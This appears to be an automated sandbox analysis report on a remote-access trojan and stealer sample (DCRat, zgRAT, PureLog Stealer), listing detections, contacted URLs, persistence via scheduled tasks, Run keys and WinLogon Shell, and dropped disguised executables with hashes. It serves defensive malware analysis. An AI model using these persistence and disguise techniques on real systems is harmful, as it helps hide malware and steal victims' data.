                          C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe100%AviraTR/Spy.Agent.hwiyw
                          C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe100%AviraTR/Spy.Agent.hwiyw
                          C:\Users\user\AppData\Local\Temp\1ke8OVZbVo.bat100%AviraBAT/Delbat.C
                          C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe63%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Program Files (x86)\Windows Media Player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exe63%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe63%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe63%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\HnmxfGsC.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\MaEvHCHq.log8%ReversingLabs
                          C:\Users\user\Desktop\WJYLrfNX.log4%ReversingLabs
                          C:\Users\user\Desktop\fsrbbHSF.log3%ReversingLabs
                          C:\Users\user\Desktop\oWARLBim.log17%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\Desktop\yEThvdnU.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\ynMPgItS.log29%ReversingLabs
                          C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe63%ReversingLabsByteCode-MSIL.Trojan.DCRat

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                          http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                          https://ipinfo.io/country0%Avira URL Cloudsafe
                          https://github.com/Pester/Pester0%Avira URL Cloudsafe
                          https://aka.ms/pscore680%Avira URL Cloudsafe
                          https://api.telegram.org/bot0%Avira URL Cloudsafe
                          http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                          https://ipinfo.io/ip0%Avira URL Cloudsafe
                          http://schemas.xmlsoap.org/wsdl/0%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          No contacted domains info

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://ipinfo.io/country4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1427464477.0000000002DF2000.00000002.00000001.01000000.00000000.sdmp, WJYLrfNX.log.0.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://aka.ms/pscore68powershell.exe, 00000025.00000002.1646778992.0000020000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1636346669.0000012E12081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1753292652.000001EA557A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1657659805.0000023B5E911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.1754802962.000002A942F21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1678127408.000001BE5C231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.1703064265.0000015F93C01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.1582628141.000002A780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1688856818.000002C680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1730168559.00000244B30D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1673180393.000001C89EC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1704908802.000001FF01561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1757598729.000001C49B1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.1731633842.000001F209931000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.1654488675.000002DF36E91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1674802007.0000019700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1680673760.000001CC1B7C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1677062673.00000255D00A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000044.00000002.1677062673.00000255D02C6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.org/bot4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1427464477.0000000002DF2000.00000002.00000001.01000000.00000000.sdmp, WJYLrfNX.log.0.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000025.00000002.1646778992.0000020000228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1636346669.0000012E122A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1753292652.000001EA55A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1657659805.0000023B5EB35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.1754802962.000002A94320A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1678127408.000001BE5C455000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.1703064265.0000015F93E28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.1582628141.000002A780226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1688856818.000002C680228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1730168559.00000244B32F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1673180393.000001C89EE28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1704908802.000001FF01788000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1757598729.000001C49B3F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.1731633842.000001F209B59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.1654488675.000002DF370B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1674802007.0000019700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1680673760.000001CC1B9F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1677062673.00000255D02C6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1443899131.0000000003604000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1646778992.0000020000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1636346669.0000012E12081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1753292652.000001EA557A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1657659805.0000023B5E911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.1754802962.000002A942F21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1678127408.000001BE5C231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.1703064265.0000015F93C01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.1582628141.000002A780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1688856818.000002C680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1730168559.00000244B30D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1673180393.000001C89EC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1704908802.000001FF01561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1757598729.000001C49B1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.1731633842.000001F209931000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.1654488675.000002DF36E91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1674802007.0000019700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1680673760.000001CC1B7C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1677062673.00000255D00A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000044.00000002.1677062673.00000255D02C6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/Pester/Pesterpowershell.exe, 00000044.00000002.1677062673.00000255D02C6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000025.00000002.1646778992.0000020000228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1636346669.0000012E122A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1753292652.000001EA55A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1657659805.0000023B5EB35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.1754802962.000002A94320A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1678127408.000001BE5C455000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.1703064265.0000015F93E28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.1582628141.000002A780226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1688856818.000002C680228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1730168559.00000244B32F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1673180393.000001C89EE28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1704908802.000001FF01788000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1757598729.000001C49B3F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.1731633842.000001F209B59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.1654488675.000002DF370B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1674802007.0000019700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1680673760.000001CC1B9F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1677062673.00000255D02C6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://ipinfo.io/ip4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1427464477.0000000002DF2000.00000002.00000001.01000000.00000000.sdmp, WJYLrfNX.log.0.drfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          No contacted IP infos

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1510313
                          Start date and time:2024-09-12 20:16:06 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 10m 55s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:80
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Sample name:4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                          Detection:MAL
                          Classification:mal100.spre.troj.expl.evad.winEXE@79/114@0/0
                          EGA Information:Failed
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, schtasks.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, 383852cm.n9shka.top, slscr.update.microsoft.com, ipinfo.io, ctldl.windowsupdate.com, time.windows.com, api.telegram.org, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, PID 6700 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          14:17:14API Interceptor528x Sleep call for process: powershell.exe modified
                          20:17:03Task SchedulerRun new task: XrtbrRarCSNElLBNKqySVVhxSZIi path: "C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                          20:17:03Task SchedulerRun new task: XrtbrRarCSNElLBNKqySVVhxSZIiX path: "C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                          20:17:05Task SchedulerRun new task: RuntimeBroker path: "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe"
                          20:17:06Task SchedulerRun new task: RuntimeBrokerR path: "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe"
                          20:17:08Task SchedulerRun new task: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca path: "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe"
                          20:17:08Task SchedulerRun new task: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca4 path: "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe"
                          20:17:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIi "C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                          21:38:42AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe"
                          21:38:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe"
                          21:39:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIi "C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                          21:39:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe"
                          21:39:22AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe"
                          21:39:31AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIi "C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                          21:39:40AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe"
                          21:39:49AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe"
                          21:40:06AutostartRun: WinLogon Shell "C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                          21:40:15AutostartRun: WinLogon Shell "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe"
                          21:40:24AutostartRun: WinLogon Shell "C:\Program Files (x86)\windows media player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                          21:40:33AutostartRun: WinLogon Shell "C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                          21:40:42AutostartRun: WinLogon Shell "C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                          21:40:51AutostartRun: WinLogon Shell "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe"

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASNs

                          No context

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Users\user\Desktop\HnmxfGsC.logeRZQCpMb4y.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                            4BJoBHQ6T3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              oG6R4bo1Rd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                PCCooker2.0_x64.exeGet hashmaliciousAsyncRAT, DCRat, GuLoader, Lokibot, Njrat, PureLog Stealer, SilverRatBrowse
                                  kQ6mFXrgYq.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    kIdT4m0aa4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      7buiOqC9uM.exeGet hashmaliciousDCRatBrowse
                                        PQmAnagsLM.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          BN57miasVe.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            5R28W1PAnS.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                              Created / dropped Files

                                              C:\Program Files (x86)\AutoIt3\Icons\3fcc2d96fa9fd9

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with very long lines (433), with no line terminators
                                              Category:dropped
                                              Size (bytes):433
                                              Entropy (8bit):5.868481435211121
                                              Encrypted:false
                                              SSDEEP:12:A5qJjDaBNljkg4tIOOJmhSmpMjtVr9Pp4DLe9:ZviN5kRmF8hV2jBp4+9
                                              MD5:5F338DC0BE2F7A24F39C3CB61F340C6A
                                              SHA1:31F4ED74EE52C8ECD4DA938704716589FF53D700
                                              SHA-256:EA001E09A7BA5CF2432EB4A9D5E8054CF7EDAEC84C25485F9ACF0F47E8A5E7EB
                                              SHA-512:370F073AAF1D0248C49265A50F4324E28E404585070106BCAE6B0EE0BC6C2B2037DE991144509963EB44DBE868CBCB20F2B193C36B4EB3A1E8C54C05D7ECEE7D
                                              Malicious:false
                                              Preview:h94srQ28bMfl5VeBP1GaGFJxPW5A9on0AN2fiOAQbpA4LLQIhWbLfdTbzGdVU29xipksd8dA109bFOmDFxcnNcUh3aqbup6ipNWgkipj2aToe1WkeZPgZWkFUDyCSCQM4aw12GdhH3uwIqDCEF6VZZITnQLhunQ0KHuEFesY6sYglx6nAv8NF5wfRcOl46wem3mB596jWiYrAmrzThg8oDvPUOwmPHeA544rL5sBzY0hgFfpuZRWZyzjIWrrMTTPEYvGsAnYzfJQMOsOtH20zHlHEViyOAyfElcIUY7uv3g3ojW4oc7FbdZ6wnCWbzKzqoMkvk4VJHF6lrdf8oKwDtDlLgVqWkT5trMAWvJDhm5UXdVFKhYxoYw7llYOOO8jxJM4ecIMeGOaysNsLQfzMgRV5PZuW4zSnVgNRakrYLShJVJ2X

                                              C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):2011136
                                              Entropy (8bit):7.569188314300448
                                              Encrypted:false
                                              SSDEEP:49152:dbmZsvFi8eKtbbrI5E6OmK0ETDZns1X/A4kAK:dbmZs9btb3IS6OBZs1vA4p
                                              MD5:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              SHA1:8D871A1D93CC069413563D42DAD3F098F4AC5E5D
                                              SHA-256:4CEB69AFC05B1475459075F2CD5688F6AA8FE6A9FF6CAE0A25D742B650C62351
                                              SHA-512:D2DB111500BA7BC55F0913F888A38BA7B3986C2439FC0ABD0CCD7FEB4D4AC0D7863EDB28C903CCB78C1F59E8EB29CBC4132AB2977560C2A5C21F089BB5CA72A7
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 63%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f................................. ........@.. ....................... ............@.................................P...K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................,................................................0..........(.... ........8........E....M...).......N...8H...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8y......0..'....... ........8........E............j...F...............8........~....(J...~....(N... ....<g... ....~....{....9....& ....8....8N... ....~....{....9....& ....8u...8*... ....~....{h...:\...& ....8Q...r...ps....z*~....9@... ....81..

                                              C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              C:\Program Files (x86)\Microsoft\Edge\Application\CSC2072A4DD6B9C45BD955850FB555C1F90.TMP

                                              Download File
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              File Type:MSVC .res
                                              Category:dropped
                                              Size (bytes):1168
                                              Entropy (8bit):4.448520842480604
                                              Encrypted:false
                                              SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                              MD5:B5189FB271BE514BEC128E0D0809C04E
                                              SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                              SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                              SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                              Malicious:false
                                              Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

                                              C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                              Download File
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):4608
                                              Entropy (8bit):3.9474842783538895
                                              Encrypted:false
                                              SSDEEP:48:6QmZtw+xZ8RxeOAkFJOcV4MKe28dAd+vqBHjuulB+hnqXSfbNtm:CGxvxVx9VvkVTkZzNt
                                              MD5:A715B6D4BFE04F8366D94AB4E851E810
                                              SHA1:C2C69BA1C060D03688F6877D0E00869080C57F30
                                              SHA-256:1448AD0AFAE3EBD6DD2FE39C6957187605D82FADC178C44FFB72A61254AF70B3
                                              SHA-512:238AF3BBF131DB2836D421B49D7382A677171A4331ACF677F6D8E2C45CAC38388D3BEA881699F70076781869A882C4343AB19FC5FDE8B146478F14B6932BE4AD
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.f.............................'... ...@....@.. ....................................@..................................'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..`.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.0.......#GUID...@... ...#Blob...........WU........%3................................................................

                                              C:\Program Files (x86)\Windows Media Player\Network Sharing\3fcc2d96fa9fd9

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):74
                                              Entropy (8bit):5.3206096154827724
                                              Encrypted:false
                                              SSDEEP:3:W+kkv4DWTIkYdlhk2IlXhk:XkkvO3LldGhk
                                              MD5:945A2AA8DD930E9825395826839FE97A
                                              SHA1:F00328487095322ED8F7BD0C80A3CA855AE2B8DD
                                              SHA-256:50862026C51DEB2713A638E31C33595AE347BAD3C7E6031BBCF2DE4F3BC76B00
